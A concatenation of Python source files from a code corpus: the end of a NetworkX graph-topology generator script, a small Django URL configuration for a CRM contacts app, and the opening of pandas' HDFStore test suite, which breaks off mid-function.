modeDescription += bcolors.WARNING + "Mode 9 - " + bcolors.ENDC + bcolors.OKGREEN + "Star Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 10 - " + bcolors.ENDC + bcolors.OKGREEN + "Path Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 11 - " + bcolors.ENDC + bcolors.OKGREEN + "Moebius Kantor Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 12 - " + bcolors.ENDC + bcolors.OKGREEN + "Tutte Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 13 - " + bcolors.ENDC + bcolors.OKGREEN + "Truncated Tetrahedron Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 14 - " + bcolors.ENDC + bcolors.OKGREEN + "Truncated Cube Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 15 - " + bcolors.ENDC + bcolors.OKGREEN + "Sedgewick Maze Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 16 - " + bcolors.ENDC + bcolors.OKGREEN + "Pappus Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 17 - " + bcolors.ENDC + bcolors.OKGREEN + "Bull Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 18 - " + bcolors.ENDC + bcolors.OKGREEN + "Krackhardt Kite Graph" + bcolors.ENDC + "\n"
print(modeDescription)
##### Generate Graph #####
while(1):
mode = int(input("Please enter mode of graph type for generation: "))
if mode == 0:
nodes = int(input("Number of nodes: "))
edgeP = float(input("Probability of edge formation: "))
G=nx.fast_gnp_random_graph(nodes, edgeP)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 1:
nodes = int(input("Number of nodes: "))
G=nx.complete_graph(nodes)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 2:
nodesL = int(input("Number of outer nodes (>= 1): "))
nodesR = int(input("Number of nodes for connections: "))
G=nx.barbell_graph(nodesL, nodesR)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 3:
rows = int(input("Number of rows: "))
cols = int(input("Number of cols: "))
G=nx.grid_2d_graph(rows, cols)
pos=nx.spectral_layout(G)
break
elif mode == 4:
nodes = int(input("Number of generations (<= 5): "))
if nodes > 5:
print("Invalid input! Please execute script again.")
sys.exit();
G=nx.dorogovtsev_goltsev_mendes_graph(nodes)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 5:
nodes = int(input("Number of nodes: "))
G=nx.cycle_graph(nodes)
pos=nx.circular_layout(G)
break
elif mode == 6:
nodes = int(input("Number of nodes: "))
G=nx.circular_ladder_graph(nodes)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 7:
nodesK = int(input("Number of nodes in candy: "))
nodesP = int(input("Number of nodes in stick: "))
G=nx.lollipop_graph(nodesK, nodesP)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 8:
nodes = int(input("Number of nodes: "))
G=nx.wheel_graph(nodes)
pos=nx.spectral_layout(G)
break
elif mode == 9:
nodes = int(input("Number of nodes: "))
G=nx.star_graph(nodes)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 10:
nodes = int(input("Number of nodes: "))
G=nx.path_graph(nodes)
pos=nx.circular_layout(G)
break
elif mode == 11:
G=nx.moebius_kantor_graph()
pos=nx.spectral_layout(G)
break
elif mode == 12:
G=nx.tutte_graph()
pos=nx.spectral_layout(G)
break
elif mode == 13:
G=nx.truncated_tetrahedron_graph()
pos=nx.spectral_layout(G)
break
elif mode == 14:
G=nx.truncated_cube_graph()
pos=nx.spectral_layout(G)
break
elif mode == 15:
G=nx.sedgewick_maze_graph()
pos=nx.spectral_layout(G)
break
elif mode == 16:
G=nx.pappus_graph()
pos=nx.spectral_layout(G)
break
elif mode == 17:
G=nx.bull_graph()
pos=nx.spectral_layout(G)
break
elif mode == 18:
G=nx.krackhardt_kite_graph()
break
else:
print("Please enter a valid number.")
costsChecker = int(input("Cost Mode (0 - random / 1 - cost of 1): "))
# assigns random weights to all of the edges
for (u, v) in G.edges():
if costsChecker == 0:
G.edge[u][v]['weight'] = random.randint(0,500)
else:
G.edge[u][v]['weight'] = 1
##### Setup Enviornment ####
if os.path.isdir("./topology"):
shutil.rmtree("./topology")
os.mkdir("./topology")
##### Output Files #####
# Write initial costs to file and create gold topology, grid graph is special case
edgeChecker = {}
edgeList = open("./topology/networkTopology.txt", 'w')
goldFile = open("./topology/goldNetwork.txt", 'w')
if mode != 3:
for v in G:
initCostFile = open("./topology/nodecosts" + str(v), 'w')
goldFile.write("Node: " + str(v) + "\n")
for n in G.neighbors(v):
initCostFile.write(str(n) + " " + str(G[v][n]['weight']) + "\n")
goldFile.write(" -> " + str(n) + ", cost = " + str(G[v][n]['weight']) + "\n")
if v*256 + n not in edgeChecker.keys() and v*256 + n not in edgeChecker.keys():
edgeList.write(str(v) + " " + str(n) + "\n")
edgeChecker[v*256 + n] = True
edgeChecker[n*256 + v] = True
else:
for v in G:
initCostFile = open("./topology/nodecosts" + str(v[0]*cols + v[1]), 'w')
goldFile.write("Node: " + str(v[0]*cols + v[1]) + "\n")
for n in G.neighbors(v):
initCostFile.write(str(n[0]*cols + n[1]) + " " + str(G[v][n]['weight']) + "\n")
goldFile.write(" -> " + str(n[0]*cols + n[1]) + ", cost = " + str(G[v][n]['weight']) + "\n")
if ((v[0]*cols + v[1])*256 + n[0]*cols + n[1]) not in edgeChecker.keys() and ((n[0]*cols + n[1])*256 + v[0]*cols + v[1]) not in edgeChecker.keys():
edgeList.write(str(v[0]*cols + v[1]) + " " + str(n[0]*cols + n[1]) + "\n")
edgeChecker[v*256 + n] = True
edgeChecker[n*256 + v] = True
if plot_lib == True:
plt.figure(1,figsize=(20,20))
try:
pos
except NameError:
plt.axis('off')
nx.draw_networkx(G,node_color='#A0CBE2',width=.5,with_labels=True, )
else:
nx.draw(G,pos,node_color='#A0CBE2',width=.5,with_labels=True)
plt.savefig("./topology/networkTopology.png") # save as png
|
py | b4035037d4657ef3fa986a433de8a3332299eea4 | from django.conf.urls import patterns, url
contact_urls = patterns('',
url(r'^$', 'crmapp.contacts.views.contact_detail', name="contact_detail"),
url(r'^edit/$',
'crmapp.contacts.views.contact_cru', name='contact_update'
),
)
|
py | b40350ada546c8314874aa580af7d775c4c0803a | import pytest
import os
import tempfile
from contextlib import contextmanager
from warnings import catch_warnings
from distutils.version import LooseVersion
import datetime
from datetime import timedelta
import numpy as np
import pandas as pd
from pandas import (Series, DataFrame, Panel, Panel4D, MultiIndex, Int64Index,
RangeIndex, Categorical, bdate_range,
date_range, timedelta_range, Index, DatetimeIndex,
isna, compat, concat, Timestamp)
import pandas.util.testing as tm
import pandas.util._test_decorators as td
from pandas.util.testing import (assert_panel4d_equal,
assert_panel_equal,
assert_frame_equal,
assert_series_equal,
set_timezone)
from pandas.compat import (is_platform_windows, is_platform_little_endian,
PY35, PY36, BytesIO, text_type,
range, lrange, u)
from pandas.io.formats.printing import pprint_thing
from pandas.core.dtypes.common import is_categorical_dtype
tables = pytest.importorskip('tables')
from pandas.io import pytables as pytables # noqa:E402
from pandas.io.pytables import (TableIterator, # noqa:E402
HDFStore, get_store, Term, read_hdf,
PossibleDataLossError, ClosedFileError)
_default_compressor = ('blosc' if LooseVersion(tables.__version__) >=
LooseVersion('2.2') else 'zlib')
# contextmanager to ensure the file cleanup
def safe_remove(path):
if path is not None:
try:
os.remove(path)
except:
pass
def safe_close(store):
try:
if store is not None:
store.close()
except:
pass
def create_tempfile(path):
""" create an unopened named temporary file """
return os.path.join(tempfile.gettempdir(), path)
@contextmanager
def ensure_clean_store(path, mode='a', complevel=None, complib=None,
fletcher32=False):
try:
# put in the temporary path if we don't have one already
if not len(os.path.dirname(path)):
path = create_tempfile(path)
store = HDFStore(path, mode=mode, complevel=complevel,
complib=complib, fletcher32=False)
yield store
finally:
safe_close(store)
if mode == 'w' or mode == 'a':
safe_remove(path)
@contextmanager
def ensure_clean_path(path):
"""
return essentially a named temporary file that is not opened
and deleted on existing; if path is a list, then create and
return list of filenames
"""
try:
if isinstance(path, list):
filenames = [create_tempfile(p) for p in path]
yield filenames
else:
filenames = [create_tempfile(path)]
yield filenames[0]
finally:
for f in filenames:
safe_remove(f)
# set these parameters so we don't have file sharing
tables.parameters.MAX_NUMEXPR_THREADS = 1
tables.parameters.MAX_BLOSC_THREADS = 1
tables.parameters.MAX_THREADS = 1
def _maybe_remove(store, key):
"""For tests using tables, try removing the table to be sure there is
no content from previous tests using the same table name."""
try:
store.remove(key)
except:
pass
class Base(object):
@classmethod
def setup_class(cls):
# Pytables 3.0.0 deprecates lots of things
tm.reset_testing_mode()
@classmethod
def teardown_class(cls):
# Pytables 3.0.0 deprecates lots of things
tm.set_testing_mode()
def setup_method(self, method):
self.path = 'tmp.__%s__.h5' % tm.rands(10)
def teardown_method(self, method):
pass
@pytest.mark.single
class TestHDFStore(Base):
def test_factory_fun(self):
path = create_tempfile(self.path)
try:
with catch_warnings(record=True):
with get_store(path) as tbl:
raise ValueError('blah')
except ValueError:
pass
finally:
safe_remove(path)
try:
with catch_warnings(record=True):
with get_store(path) as tbl:
tbl['a'] = tm.makeDataFrame()
with catch_warnings(record=True):
with get_store(path) as tbl:
assert len(tbl) == 1
assert type(tbl['a']) == DataFrame
finally:
safe_remove(self.path)
def test_context(self):
path = create_tempfile(self.path)
try:
with HDFStore(path) as tbl:
raise ValueError('blah')
except ValueError:
pass
finally:
safe_remove(path)
try:
with HDFStore(path) as tbl:
tbl['a'] = tm.makeDataFrame()
with HDFStore(path) as tbl:
assert len(tbl) == 1
assert type(tbl['a']) == DataFrame
finally:
safe_remove(path)
def test_conv_read_write(self):
path = create_tempfile(self.path)
try:
def roundtrip(key, obj, **kwargs):
obj.to_hdf(path, key, **kwargs)
return read_hdf(path, key)
o = tm.makeTimeSeries()
assert_series_equal(o, roundtrip('series', o))
o = tm.makeStringSeries()
assert_series_equal(o, roundtrip('string_series', o))
o = tm.makeDataFrame()
assert_frame_equal(o, roundtrip('frame', o))
with catch_warnings(record=True):
o = tm.makePanel()
assert_panel_equal(o, roundtrip('panel', o))
# table
df = DataFrame(dict(A=lrange(5), B=lrange(5)))
df.to_hdf(path, 'table', append=True)
result = read_hdf(path, 'table', where=['index>2'])
assert_frame_equal(df[df.index > 2], result)
finally:
safe_remove(path)
def test_long_strings(self):
# GH6166
# unconversion of long strings was being chopped in earlier
# versions of numpy < 1.7.2
df = DataFrame({'a': tm.rands_array(100, size=10)},
index=tm.rands_array(100, size=10))
with ensure_clean_store(self.path) as store:
store.append('df', df, data_columns=['a'])
result = store.select('df')
assert_frame_equal(df, result)
def test_api(self):
# GH4584
# API issue when to_hdf doesn't acdept append AND format args
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.iloc[:10].to_hdf(path, 'df', append=True, format='table')
df.iloc[10:].to_hdf(path, 'df', append=True, format='table')
assert_frame_equal(read_hdf(path, 'df'), df)
# append to False
df.iloc[:10].to_hdf(path, 'df', append=False, format='table')
df.iloc[10:].to_hdf(path, 'df', append=True, format='table')
assert_frame_equal(read_hdf(path, 'df'), df)
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.iloc[:10].to_hdf(path, 'df', append=True)
df.iloc[10:].to_hdf(path, 'df', append=True, format='table')
assert_frame_equal(read_hdf(path, 'df'), df)
# append to False
df.iloc[:10].to_hdf(path, 'df', append=False, format='table')
df.iloc[10:].to_hdf(path, 'df', append=True)
assert_frame_equal(read_hdf(path, 'df'), df)
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.to_hdf(path, 'df', append=False, format='fixed')
assert_frame_equal(read_hdf(path, 'df'), df)
df.to_hdf(path, 'df', append=False, format='f')
assert_frame_equal(read_hdf(path, 'df'), df)
df.to_hdf(path, 'df', append=False)
assert_frame_equal(read_hdf(path, 'df'), df)
df.to_hdf(path, 'df')
assert_frame_equal(read_hdf(path, 'df'), df)
with ensure_clean_store(self.path) as store:
path = store._path
df = tm.makeDataFrame()
_maybe_remove(store, 'df')
store.append('df', df.iloc[:10], append=True, format='table')
store.append('df', df.iloc[10:], append=True, format='table')
assert_frame_equal(store.select('df'), df)
# append to False
_maybe_remove(store, 'df')
store.append('df', df.iloc[:10], append=False, format='table')
store.append('df', df.iloc[10:], append=True, format='table')
assert_frame_equal(store.select('df'), df)
# formats
_maybe_remove(store, 'df')
store.append('df', df.iloc[:10], append=False, format='table')
store.append('df', df.iloc[10:], append=True, format='table')
assert_frame_equal(store.select('df'), df)
_maybe_remove(store, 'df')
store.append('df', df.iloc[:10], append=False, format='table')
store.append('df', df.iloc[10:], append=True, format=None)
assert_frame_equal(store.select('df'), df)
with ensure_clean_path(self.path) as path:
# invalid
df = tm.makeDataFrame()
pytest.raises(ValueError, df.to_hdf, path,
'df', append=True, format='f')
pytest.raises(ValueError, df.to_hdf, path,
'df', append=True, format='fixed')
pytest.raises(TypeError, df.to_hdf, path,
'df', append=True, format='foo')
pytest.raises(TypeError, df.to_hdf, path,
'df', append=False, format='bar')
# File path doesn't exist
path = ""
pytest.raises(compat.FileNotFoundError,
read_hdf, path, 'df')
def test_api_default_format(self):
# default_format option
with ensure_clean_store(self.path) as store:
df = tm.makeDataFrame()
pd.set_option('io.hdf.default_format', 'fixed')
_maybe_remove(store, 'df')
store.put('df', df)
assert not store.get_storer('df').is_table
pytest.raises(ValueError, store.append, 'df2', df)
pd.set_option('io.hdf.default_format', 'table')
_maybe_remove(store, 'df')
store.put('df', df)
assert store.get_storer('df').is_table
_maybe_remove(store, 'df2')
store.append('df2', df)
assert store.get_storer('df').is_table
pd.set_option('io.hdf.default_format', None)
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
pd.set_option('io.hdf.default_format', 'fixed')
df.to_hdf(path, 'df')
with HDFStore(path) as store:
assert not store.get_storer('df').is_table
pytest.raises(ValueError, df.to_hdf, path, 'df2', append=True)
pd.set_option('io.hdf.default_format', 'table')
df.to_hdf(path, 'df3')
with HDFStore(path) as store:
assert store.get_storer('df3').is_table
df.to_hdf(path, 'df4', append=True)
with HDFStore(path) as store:
assert store.get_storer('df4').is_table
pd.set_option('io.hdf.default_format', None)
def test_keys(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
store['b'] = tm.makeStringSeries()
store['c'] = tm.makeDataFrame()
with catch_warnings(record=True):
store['d'] = tm.makePanel()
store['foo/bar'] = tm.makePanel()
assert len(store) == 5
expected = set(['/a', '/b', '/c', '/d', '/foo/bar'])
assert set(store.keys()) == expected
assert set(store) == expected
def test_iter_empty(self):
with ensure_clean_store(self.path) as store:
# GH 12221
assert list(store) == []
def test_repr(self):
with ensure_clean_store(self.path) as store:
repr(store)
store.info()
store['a'] = tm.makeTimeSeries()
store['b'] = tm.makeStringSeries()
store['c'] = tm.makeDataFrame()
with catch_warnings(record=True):
store['d'] = tm.makePanel()
store['foo/bar'] = tm.makePanel()
store.append('e', tm.makePanel())
df = tm.makeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['bool1'] = df['A'] > 0
df['bool2'] = df['B'] > 0
df['bool3'] = True
df['int1'] = 1
df['int2'] = 2
df['timestamp1'] = Timestamp('20010102')
df['timestamp2'] = Timestamp('20010103')
df['datetime1'] = datetime.datetime(2001, 1, 2, 0, 0)
df['datetime2'] = datetime.datetime(2001, 1, 3, 0, 0)
df.loc[3:6, ['obj1']] = np.nan
df = df._consolidate()._convert(datetime=True)
# PerformanceWarning
with catch_warnings(record=True):
store['df'] = df
# make a random group in hdf space
store._handle.create_group(store._handle.root, 'bah')
assert store.filename in repr(store)
assert store.filename in str(store)
store.info()
# storers
with ensure_clean_store(self.path) as store:
df = tm.makeDataFrame()
store.append('df', df)
s = store.get_storer('df')
repr(s)
str(s)
def test_contains(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
store['b'] = tm.makeDataFrame()
store['foo/bar'] = tm.makeDataFrame()
assert 'a' in store
assert 'b' in store
assert 'c' not in store
assert 'foo/bar' in store
assert '/foo/bar' in store
assert '/foo/b' not in store
assert 'bar' not in store
# gh-2694: tables.NaturalNameWarning
with catch_warnings(record=True):
store['node())'] = tm.makeDataFrame()
assert 'node())' in store
def test_versioning(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
store['b'] = tm.makeDataFrame()
df = tm.makeTimeDataFrame()
_maybe_remove(store, 'df1')
store.append('df1', df[:10])
store.append('df1', df[10:])
assert store.root.a._v_attrs.pandas_version == '0.15.2'
assert store.root.b._v_attrs.pandas_version == '0.15.2'
assert store.root.df1._v_attrs.pandas_version == '0.15.2'
# write a file and wipe its versioning
_maybe_remove(store, 'df2')
store.append('df2', df)
# this is an error because its table_type is appendable, but no
# version info
store.get_node('df2')._v_attrs.pandas_version = None
pytest.raises(Exception, store.select, 'df2')
def test_mode(self):
df = tm.makeTimeDataFrame()
def check(mode):
with ensure_clean_path(self.path) as path:
# constructor
if mode in ['r', 'r+']:
pytest.raises(IOError, HDFStore, path, mode=mode)
else:
store = HDFStore(path, mode=mode)
assert store._handle.mode == mode
store.close()
with ensure_clean_path(self.path) as path:
# context
if mode in ['r', 'r+']:
def f():
with HDFStore(path, mode=mode) as store: # noqa
pass
pytest.raises(IOError, f)
else:
with HDFStore(path, mode=mode) as store:
assert store._handle.mode == mode
with ensure_clean_path(self.path) as path:
# conv write
if mode in ['r', 'r+']:
pytest.raises(IOError, df.to_hdf,
path, 'df', mode=mode)
df.to_hdf(path, 'df', mode='w')
else:
df.to_hdf(path, 'df', mode=mode)
# conv read
if mode in ['w']:
pytest.raises(ValueError, read_hdf,
path, 'df', mode=mode)
else:
result = read_hdf(path, 'df', mode=mode)
assert_frame_equal(result, df)
def check_default_mode():
# read_hdf uses default mode
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='w')
result = read_hdf(path, 'df')
assert_frame_equal(result, df)
check('r')
check('r+')
check('a')
check('w')
check_default_mode()
def test_reopen_handle(self):
with ensure_clean_path(self.path) as path:
store = HDFStore(path, mode='a')
store['a'] = tm.makeTimeSeries()
# invalid mode change
pytest.raises(PossibleDataLossError, store.open, 'w')
store.close()
assert not store.is_open
# truncation ok here
store.open('w')
assert store.is_open
assert len(store) == 0
store.close()
assert not store.is_open
store = HDFStore(path, mode='a')
store['a'] = tm.makeTimeSeries()
# reopen as read
store.open('r')
assert store.is_open
assert len(store) == 1
assert store._mode == 'r'
store.close()
assert not store.is_open
# reopen as append
store.open('a')
assert store.is_open
assert len(store) == 1
assert store._mode == 'a'
store.close()
assert not store.is_open
# reopen as append (again)
store.open('a')
assert store.is_open
assert len(store) == 1
assert store._mode == 'a'
store.close()
assert not store.is_open
def test_open_args(self):
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
# create an in memory store
store = HDFStore(path, mode='a', driver='H5FD_CORE',
driver_core_backing_store=0)
store['df'] = df
store.append('df2', df)
tm.assert_frame_equal(store['df'], df)
tm.assert_frame_equal(store['df2'], df)
store.close()
# the file should not have actually been written
assert not os.path.exists(path)
def test_flush(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
store.flush()
store.flush(fsync=True)
def test_get(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
left = store.get('a')
right = store['a']
tm.assert_series_equal(left, right)
left = store.get('/a')
right = store['/a']
tm.assert_series_equal(left, right)
pytest.raises(KeyError, store.get, 'b')
def test_getattr(self):
with ensure_clean_store(self.path) as store:
s = tm.makeTimeSeries()
store['a'] = s
# test attribute access
result = store.a
tm.assert_series_equal(result, s)
result = getattr(store, 'a')
tm.assert_series_equal(result, s)
df = tm.makeTimeDataFrame()
store['df'] = df
result = store.df
tm.assert_frame_equal(result, df)
# errors
pytest.raises(AttributeError, getattr, store, 'd')
for x in ['mode', 'path', 'handle', 'complib']:
pytest.raises(AttributeError, getattr, store, x)
# not stores
for x in ['mode', 'path', 'handle', 'complib']:
getattr(store, "_%s" % x)
def test_put(self):
with ensure_clean_store(self.path) as store:
ts = tm.makeTimeSeries()
df = tm.makeTimeDataFrame()
store['a'] = ts
store['b'] = df[:10]
store['foo/bar/bah'] = df[:10]
store['foo'] = df[:10]
store['/foo'] = df[:10]
store.put('c', df[:10], format='table')
# not OK, not a table
pytest.raises(
ValueError, store.put, 'b', df[10:], append=True)
# node does not currently exist, test _is_table_type returns False
# in this case
# _maybe_remove(store, 'f')
# pytest.raises(ValueError, store.put, 'f', df[10:],
# append=True)
# can't put to a table (use append instead)
pytest.raises(ValueError, store.put, 'c', df[10:], append=True)
# overwrite table
store.put('c', df[:10], format='table', append=False)
tm.assert_frame_equal(df[:10], store['c'])
def test_put_string_index(self):
with ensure_clean_store(self.path) as store:
index = Index(
["I am a very long string index: %s" % i for i in range(20)])
s = Series(np.arange(20), index=index)
df = DataFrame({'A': s, 'B': s})
store['a'] = s
tm.assert_series_equal(store['a'], s)
store['b'] = df
tm.assert_frame_equal(store['b'], df)
# mixed length
index = Index(['abcdefghijklmnopqrstuvwxyz1234567890'] +
["I am a very long string index: %s" % i
for i in range(20)])
s = Series(np.arange(21), index=index)
df = DataFrame({'A': s, 'B': s})
store['a'] = s
tm.assert_series_equal(store['a'], s)
store['b'] = df
tm.assert_frame_equal(store['b'], df)
def test_put_compression(self):
with ensure_clean_store(self.path) as store:
df = tm.makeTimeDataFrame()
store.put('c', df, format='table', complib='zlib')
tm.assert_frame_equal(store['c'], df)
# can't compress if format='fixed'
pytest.raises(ValueError, store.put, 'b', df,
format='fixed', complib='zlib')
@td.skip_if_windows_python_3
def test_put_compression_blosc(self):
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
# can't compress if format='fixed'
pytest.raises(ValueError, store.put, 'b', df,
format='fixed', complib='blosc')
store.put('c', df, format='table', complib='blosc')
tm.assert_frame_equal(store['c'], df)
def test_complibs_default_settings(self):
# GH15943
df = tm.makeDataFrame()
# Set complevel and check if complib is automatically set to
# default value
with ensure_clean_path(self.path) as tmpfile:
df.to_hdf(tmpfile, 'df', complevel=9)
result = pd.read_hdf(tmpfile, 'df')
tm.assert_frame_equal(result, df)
with tables.open_file(tmpfile, mode='r') as h5file:
for node in h5file.walk_nodes(where='/df', classname='Leaf'):
assert node.filters.complevel == 9
assert node.filters.complib == 'zlib'
# Set complib and check to see if compression is disabled
with ensure_clean_path(self.path) as tmpfile:
df.to_hdf(tmpfile, 'df', complib='zlib')
result = pd.read_hdf(tmpfile, 'df')
tm.assert_frame_equal(result, df)
with tables.open_file(tmpfile, mode='r') as h5file:
for node in h5file.walk_nodes(where='/df', classname='Leaf'):
assert node.filters.complevel == 0
assert node.filters.complib is None
# Check if not setting complib or complevel results in no compression
with ensure_clean_path(self.path) as tmpfile:
df.to_hdf(tmpfile, 'df')
result = pd.read_hdf(tmpfile, 'df')
tm.assert_frame_equal(result, df)
with tables.open_file(tmpfile, mode='r') as h5file:
for node in h5file.walk_nodes(where='/df', classname='Leaf'):
assert node.filters.complevel == 0
assert node.filters.complib is None
# Check if file-defaults can be overridden on a per table basis
with ensure_clean_path(self.path) as tmpfile:
store = pd.HDFStore(tmpfile)
store.append('dfc', df, complevel=9, complib='blosc')
store.append('df', df)
store.close()
with tables.open_file(tmpfile, mode='r') as h5file:
for node in h5file.walk_nodes(where='/df', classname='Leaf'):
assert node.filters.complevel == 0
assert node.filters.complib is None
for node in h5file.walk_nodes(where='/dfc', classname='Leaf'):
assert node.filters.complevel == 9
assert node.filters.complib == 'blosc'
def test_complibs(self):
# GH14478
df = tm.makeDataFrame()
# Building list of all complibs and complevels tuples
all_complibs = tables.filters.all_complibs
# Remove lzo if its not available on this platform
if not tables.which_lib_version('lzo'):
all_complibs.remove('lzo')
# Remove bzip2 if its not available on this platform
if not tables.which_lib_version("bzip2"):
all_complibs.remove("bzip2")
all_levels = range(0, 10)
all_tests = [(lib, lvl) for lib in all_complibs for lvl in all_levels]
for (lib, lvl) in all_tests:
with ensure_clean_path(self.path) as tmpfile:
gname = 'foo'
# Write and read file to see if data is consistent
df.to_hdf(tmpfile, gname, complib=lib, complevel=lvl)
result = pd.read_hdf(tmpfile, gname)
tm.assert_frame_equal(result, df)
# Open file and check metadata
# for correct amount of compression
h5table = tables.open_file(tmpfile, mode='r')
for node in h5table.walk_nodes(where='/' + gname,
classname='Leaf'):
assert node.filters.complevel == lvl
if lvl == 0:
assert node.filters.complib is None
else:
assert node.filters.complib == lib
h5table.close()
def test_put_integer(self):
# non-date, non-string index
df = DataFrame(np.random.randn(50, 100))
self._check_roundtrip(df, tm.assert_frame_equal)
def test_put_mixed_type(self):
df = tm.makeTimeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['bool1'] = df['A'] > 0
df['bool2'] = df['B'] > 0
df['bool3'] = True
df['int1'] = 1
df['int2'] = 2
df['timestamp1'] = Timestamp('20010102')
df['timestamp2'] = Timestamp('20010103')
df['datetime1'] = datetime.datetime(2001, 1, 2, 0, 0)
df['datetime2'] = datetime.datetime(2001, 1, 3, 0, 0)
df.loc[3:6, ['obj1']] = np.nan
df = df._consolidate()._convert(datetime=True)
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df')
# PerformanceWarning
with catch_warnings(record=True):
store.put('df', df)
expected = store.get('df')
tm.assert_frame_equal(expected, df)
def test_append(self):
with ensure_clean_store(self.path) as store:
# this is allowed by almost always don't want to do it
# tables.NaturalNameWarning):
with catch_warnings(record=True):
df = tm.makeTimeDataFrame()
_maybe_remove(store, 'df1')
store.append('df1', df[:10])
store.append('df1', df[10:])
tm.assert_frame_equal(store['df1'], df)
_maybe_remove(store, 'df2')
store.put('df2', df[:10], format='table')
store.append('df2', df[10:])
tm.assert_frame_equal(store['df2'], df)
_maybe_remove(store, 'df3')
store.append('/df3', df[:10])
store.append('/df3', df[10:])
tm.assert_frame_equal(store['df3'], df)
# this is allowed by almost always don't want to do it
# tables.NaturalNameWarning
_maybe_remove(store, '/df3 foo')
store.append('/df3 foo', df[:10])
store.append('/df3 foo', df[10:])
tm.assert_frame_equal(store['df3 foo'], df)
# panel
wp = tm.makePanel()
_maybe_remove(store, 'wp1')
store.append('wp1', wp.iloc[:, :10, :])
store.append('wp1', wp.iloc[:, 10:, :])
assert_panel_equal(store['wp1'], wp)
# ndim
p4d = tm.makePanel4D()
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :])
store.append('p4d', p4d.iloc[:, :, 10:, :])
assert_panel4d_equal(store['p4d'], p4d)
# test using axis labels
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=[
'items', 'major_axis', 'minor_axis'])
store.append('p4d', p4d.iloc[:, :, 10:, :], axes=[
'items', 'major_axis', 'minor_axis'])
assert_panel4d_equal(store['p4d'], p4d)
# test using different number of items on each axis
p4d2 = p4d.copy()
p4d2['l4'] = p4d['l1']
p4d2['l5'] = p4d['l1']
_maybe_remove(store, 'p4d2')
store.append(
'p4d2', p4d2, axes=['items', 'major_axis', 'minor_axis'])
assert_panel4d_equal(store['p4d2'], p4d2)
# test using differt order of items on the non-index axes
_maybe_remove(store, 'wp1')
wp_append1 = wp.iloc[:, :10, :]
store.append('wp1', wp_append1)
wp_append2 = wp.iloc[:, 10:, :].reindex(items=wp.items[::-1])
store.append('wp1', wp_append2)
assert_panel_equal(store['wp1'], wp)
# dtype issues - mizxed type in a single object column
df = DataFrame(data=[[1, 2], [0, 1], [1, 2], [0, 0]])
df['mixed_column'] = 'testing'
df.loc[2, 'mixed_column'] = np.nan
_maybe_remove(store, 'df')
store.append('df', df)
tm.assert_frame_equal(store['df'], df)
# uints - test storage of uints
uint_data = DataFrame({
'u08': Series(np.random.randint(0, high=255, size=5),
dtype=np.uint8),
'u16': Series(np.random.randint(0, high=65535, size=5),
dtype=np.uint16),
'u32': Series(np.random.randint(0, high=2**30, size=5),
dtype=np.uint32),
'u64': Series([2**58, 2**59, 2**60, 2**61, 2**62],
dtype=np.uint64)}, index=np.arange(5))
_maybe_remove(store, 'uints')
store.append('uints', uint_data)
tm.assert_frame_equal(store['uints'], uint_data)
# uints - test storage of uints in indexable columns
_maybe_remove(store, 'uints')
# 64-bit indices not yet supported
store.append('uints', uint_data, data_columns=[
'u08', 'u16', 'u32'])
tm.assert_frame_equal(store['uints'], uint_data)
def test_append_series(self):
with ensure_clean_store(self.path) as store:
# basic
ss = tm.makeStringSeries()
ts = tm.makeTimeSeries()
ns = Series(np.arange(100))
store.append('ss', ss)
result = store['ss']
tm.assert_series_equal(result, ss)
assert result.name is None
store.append('ts', ts)
result = store['ts']
tm.assert_series_equal(result, ts)
assert result.name is None
ns.name = 'foo'
store.append('ns', ns)
result = store['ns']
tm.assert_series_equal(result, ns)
assert result.name == ns.name
# select on the values
expected = ns[ns > 60]
result = store.select('ns', 'foo>60')
tm.assert_series_equal(result, expected)
# select on the index and values
expected = ns[(ns > 70) & (ns.index < 90)]
result = store.select('ns', 'foo>70 and index<90')
tm.assert_series_equal(result, expected)
# multi-index
mi = DataFrame(np.random.randn(5, 1), columns=['A'])
mi['B'] = np.arange(len(mi))
mi['C'] = 'foo'
mi.loc[3:5, 'C'] = 'bar'
mi.set_index(['C', 'B'], inplace=True)
s = mi.stack()
s.index = s.index.droplevel(2)
store.append('mi', s)
tm.assert_series_equal(store['mi'], s)
def test_store_index_types(self):
# GH5386
# test storing various index types
with ensure_clean_store(self.path) as store:
def check(format, index):
df = DataFrame(np.random.randn(10, 2), columns=list('AB'))
df.index = index(len(df))
